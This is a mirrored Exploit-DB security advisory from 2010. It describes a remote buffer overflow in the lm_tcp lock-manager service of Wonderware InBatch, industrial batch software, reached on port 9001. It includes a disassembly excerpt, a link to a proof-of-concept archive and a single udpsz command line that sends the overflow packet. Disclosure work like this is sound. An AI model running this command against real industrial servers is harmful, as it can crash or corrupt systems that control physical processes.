WonderWare InBatch 9.0sp1 – Buffer Overflow

• Exploit Database
• 11 阅读

• 作者： Luigi Auriemma
  日期： 2010-12-08
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/15707/

• Source: http://aluigi.org/adv/inbatch_1-adv.txt
  
  #######################################################################
  
   Luigi Auriemma
  
  Application:Wonderware InBatch
  http://global.wonderware.com/EN/Pages/WonderwareInBatchSoftware.aspx
  any other software that uses the lm_tcp server (called
  "Raima Database lockmgr") like Foxboro I/A Batch
  Versions: lm_tcp <= 9.0.0 0248.18.0.0 (InBatch <= 9.0sp1)
  Platforms:Windows, Linux
  Bug:buffer-overflow
  Exploitation: remote, versus server
  Date: 07 Dec 2010
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bug
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  InBatch is a software for the industry automation sector for creating
  batch processes.
  
  
  #######################################################################
  
  ======
  2) Bug
  ======
  
  
  The lm_tcp service listens (manually or automatically during the
  launching of "Environment Display/Manager") on port 9001 and is
  vulnerable to a buffer overflow during the copying of a string in a
  buffer of 150 bytes which is part of a fixed structure.
  
  The overflow (max 19204 chars) allows only to overwrite the two memory
  pointers located after the space assigned to the copying of the string
  and they are immediately used for two memset(buffer, 0, 2) operations
  with the consequent effect of writing a 16bit 0x0000 in an arbitrary
  memory location:
  
  00403E40|> 8A01 /MOV AL,BYTE PTR DS:[ECX] ; strcpy
  00403E42|. 8802 |MOV BYTE PTR DS:[EDX],AL
  00403E44|. 83C1 01|ADD ECX,1
  00403E47|. 83C2 01|ADD EDX,1
  00403E4A|. 84C0 |TEST AL,AL
  00403E4C|.^75 F2\JNZ SHORT lm_tcp.00403E40
  00403E4E|. 8B4424 24MOV EAX,DWORD PTR SS:[ESP+24]
  00403E52|. 66:8B48 12 MOV CX,WORD PTR DS:[EAX+12]
  00403E56|. 8B15 48A84000MOV EDX,DWORD PTR DS:[40A848]
  00403E5C|. 66:83E9 78 SUB CX,78
  00403E60|. 66:F7D9NEG CX
  00403E63|. 1BC9 SBB ECX,ECX
  00403E65|. 83E1 0EAND ECX,0E
  00403E68|. 83C1 58ADD ECX,58
  00403E6B|. 898C16 98000000MOV DWORD PTR DS:[ESI+EDX+98],ECX
  00403E72|. A1 78A84000MOV EAX,DWORD PTR DS:[40A878]
  00403E77|. 8B0D 48A84000MOV ECX,DWORD PTR DS:[40A848]
  00403E7D|. 8B940E 9C000000MOV EDX,DWORD PTR DS:[ESI+ECX+9C] ; first pointer overwritten
  00403E84|. 50 PUSH EAX
  00403E85|. 52 PUSH EDX
  00403E86|. E8 050C0000CALL lm_tcp.00404A90; memset
  00403E8B|. A1 78A84000MOV EAX,DWORD PTR DS:[40A878]
  00403E90|. 8B0D 48A84000MOV ECX,DWORD PTR DS:[40A848]
  00403E96|. 8B940E A0000000MOV EDX,DWORD PTR DS:[ESI+ECX+A0] ; second pointer overwritten
  00403E9D|. 50 PUSH EAX
  00403E9E|. 52 PUSH EDX
  00403E9F|. E8 EC0B0000CALL lm_tcp.00404A90; memset
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip (udpsz.zip)
  
  udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################